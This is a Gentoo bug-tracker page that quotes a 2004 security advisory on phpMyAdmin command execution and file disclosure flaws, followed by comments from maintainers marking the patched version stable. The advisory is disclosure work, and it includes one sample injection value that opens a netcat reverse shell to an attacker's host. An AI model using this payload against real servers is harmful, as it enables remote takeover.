Bug List: (This bug is not in your last search results)   Show last search results      Search page      Enter new bug
Bug#: 74303
Alias:
Product:
Component:
Status: RESOLVED
Resolution: FIXED
Assigned To: Gentoo Security <security@gentoo.org>
Hardware:
OS:
Version:
Priority:
Severity:
Reporter: Aarni Honka <aarni.honka@gmail.com>
Add CC:
CC:
Remove selected CCs
URL:
Summary:
Status Whiteboard:
Keywords:
Flags: Requestee:
 
 
  ()

Filename Description Type Creator Created Size Actions
Create a New Attachment (proposed patch, testcase, etc.) View All

Bug 74303 depends on: Show dependency tree
Bug 74303 blocks:

Additional Comments: (this is where you put emerge --info)


Not eligible to see or edit group visibility for this bug.






View Bug Activity   |   Format For Printing   |   XML   |   Clone This Bug

Description:   Opened: 2004-12-13 10:23 0000 
Exaprobe
                            www.exaprobe.com

                           Security Advisory

 Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <ngregoire@exaprobe.com>
 Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
     Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html


Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the 
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.


Technical details :
===================

Command execution :

	- bug introduced in 2.6.0-pl2
	- attacker does *not* need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- external transformations must be activated
	- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

	- attacker need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- $cfg['UploadDir'] must be defined
	- exploitation is done via 'sql_localfile'


Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.


Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.


CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin

------- Comment #1 From Sune Kloppenborg Jeppesen 2004-12-13 11:33:22 0000 ------- 
Tom please advise.

------- Comment #2 From Tom Payne (RETIRED) 2004-12-14 03:44:18 0000 ------- 
2.6.1_rc1 contains fix. Stable on x86. Other arches, please mark stable.

Cheers,

Tom

------- Comment #3 From Sune Kloppenborg Jeppesen 2004-12-14 04:01:43 0000 ------- 
Thx Tom,

Arches please mark 2.6.1_rc1 stable.

------- Comment #4 From Guy Martin 2004-12-14 06:49:39 0000 ------- 
Stable on hppa.

------- Comment #5 From Bryan Østergaard (RETIRED) 2004-12-14 14:21:35 0000 ------- 
Alpha stable.

------- Comment #6 From Jason Wever (RETIRED) 2004-12-14 17:39:11 0000 ------- 
Stable
On
SPARC

------- Comment #7 From Jochen Maes (RETIRED) 2004-12-14 22:49:08 0000 ------- 
stable on PPC

------- Comment #8 From Jochen Maes (RETIRED) 2004-12-15 04:19:19 0000 ------- 
forgot to remove the mail

------- Comment #9 From Simon Stelling (RETIRED) 2004-12-16 11:06:32 0000 ------- 
amd64 done

------- Comment #10 From Thierry Carrez (RETIRED) 2004-12-17 14:25:54 0000 ------- 
Ready to go

------- Comment #11 From Sune Kloppenborg Jeppesen 2004-12-19 12:24:19 0000 ------- 
GLSA 200412-19
Bug List: (This bug is not in your last search results)   Show last search results      Search page      Enter new bug